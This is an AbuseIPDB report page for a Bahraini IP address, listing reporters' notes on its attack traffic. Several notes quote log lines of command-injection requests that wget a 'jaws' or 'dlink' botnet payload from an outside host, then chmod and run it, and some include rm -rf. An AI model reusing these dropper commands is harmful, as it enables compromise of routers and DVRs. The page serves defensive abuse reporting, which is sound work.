JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 95.84.64.49

95.84.64.49 was found in our database!

This IP was reported 17 times. Confidence of Abuse is 85%: ?

85%

ISP	STC BAHRAIN B.S.C CLOSED
Usage Type	Fixed Line ISP
ASN	AS51375
Domain Name	stc.com.bh
Country	🇧🇭 Bahrain
City	Manama, Manama

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 95.84.64.49

Whois 95.84.64.49

IP Abuse Reports for 95.84.64.49:

This IP address has been reported a total of 17 times from 16 distinct sources. 95.84.64.49 was first reported on December 10th 2025, and the most recent report was 1 day ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇬🇧 openstrike.co.uk	2026-06-04 05:13:15 (1 day ago)	1 attack on wget probes: GET /shell?cd+/tmp;rm+-rf+;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaw ... show more 1 attack on wget probes: GET /shell?cd+/tmp;rm+-rf+;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; show less	Hacking
🇸🇪 adaml1324	2026-06-03 17:25:52 (1 day ago)	Web application exploit probing From server logs: 2026-06-03 09:55:22 (direkt-IP) GET /login.cgi? ... show more Web application exploit probing From server logs: 2026-06-03 09:55:22 (direkt-IP) GET /login.cgi?cli=aa%20aa%27;wget%20http://140.233.190.47/dlink%20-O%20-%3E%20/ [400 Bad Request] UA: terrabot-owned-you show less	Web App Attack
🇬🇧 myintarweb	2026-06-03 10:18:36 (2 days ago)	95.84.64.49 - - [03/Jun/2026:11:18:35 +0100] 80 "GET /shell?cd+/tmp;rm+-rf+;wget+ 140.233.190.47/ja ... show more 95.84.64.49 - - [03/Jun/2026:11:18:35 +0100] 80 "GET /shell?cd+/tmp;rm+-rf+;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws;" 400 1467 "-" "-" ... show less	Hacking Bad Web Bot Web App Attack
🇩🇪 london2038.com	2026-06-03 08:39:46 (2 days ago)	Malformed or malicious web request 95.84.64.49 - - [03/Jun/2026:10:39:42 +0200] "GET /shell?cd+/tmp; ... show more Malformed or malicious web request 95.84.64.49 - - [03/Jun/2026:10:39:42 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 400 157 "-" "-" show less	Hacking Web App Attack
🇹🇭 Sawasdee	2026-06-03 08:39:06 (2 days ago)	Unwanted checking 80 or 443 port ...	Bad Web Bot
🇬🇧 PeravixGroup	2026-06-03 08:13:45 (2 days ago)	Honeypot detection: Android Debug Bridge (ADB) unauthorized access attempt on port 5555. Severity: M ... show more Honeypot detection: Android Debug Bridge (ADB) unauthorized access attempt on port 5555. Severity: MEDIUM. Aaran.cloud show less	IoT Targeted Hacking
🇮🇪 RoboSOC	2026-06-03 07:56:21 (2 days ago)	MVPower DVR Shell Unauthenticated Command Execution Vulnerability, PTR: PTR record not found	Hacking
🇧🇷 SOC PR	2026-06-03 05:37:02 (2 days ago)	IPS: RCE attempt via web shell endpoint with JAWS malware dropper. Attempt to download and execute J ... show more IPS: RCE attempt via web shell endpoint with JAWS malware dropper. Attempt to download and execute JAWS botnet payload. User-Agent: terrabot-owned-you. show less	Web App Attack
🇩🇪 dpsbs	2026-06-03 05:28:05 (2 days ago)	multiple ips intrustions detected	Hacking
🇮🇩 securejdprop	2026-06-03 04:10:17 (2 days ago)	This IP was detected by CrowdSec triggering crowdsecurity/suricata-major-severity(ET EXPLOIT D-Link ... show more This IP was detected by CrowdSec triggering crowdsecurity/suricata-major-severity(ET EXPLOIT D-Link DSL-2750B - OS Command Injection). Ip 95.84.64.49 performed 'crowdsecurity/suricata-major-severity' (1 events over 0s) at 2026-06-03 04:10:16.321240869 +0000 UTC show less	Hacking Web App Attack
🇹🇭 MWA SOC	2026-06-03 04:01:23 (2 days ago)		Hacking
🇦🇱 router.al	2026-06-03 03:30:03 (2 days ago)	06/03/2026-03:30:03.193319 95.84.64.49 Protocol: 6 ET EXPLOIT MVPower DVR Shell UCE	Hacking
🇺🇸 MPL	2026-06-03 03:23:01 (2 days ago)	tcp/80 (2 or more attempts)	Port Scan
Anonymous	2026-06-02 22:10:43 (2 days ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
🇨🇦 polycoda	2026-05-29 11:27:18 (6 days ago)	🥶 Part of massive botnet scraping campaign that nearly turned into a DDoS on 2025-11-27	DDoS Attack

Showing 1 to 15 of 17 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇸🇬 97.74.92.13

🇷🇴 80.94.92.177

🇵🇪 38.210.105.10

🇮🇩 36.66.16.233

🇦🇱 31.22.48.28

🇨🇳 27.19.72.58

🇧🇷 138.255.157.62

🇨🇳 101.96.201.126

🇵🇱 95.214.55.94

🇨🇳 36.27.28.239

🇬🇧 35.203.210.117

🇧🇪 34.62.201.49

🇰🇷 220.119.37.141

🇹🇷 194.15.52.36

🇺🇸 173.239.224.114

🇫🇷 91.231.89.202

🇭🇰 47.86.198.105

🇨🇳 36.137.79.219

🇧🇪 34.79.35.36

🇧🇪 34.38.190.34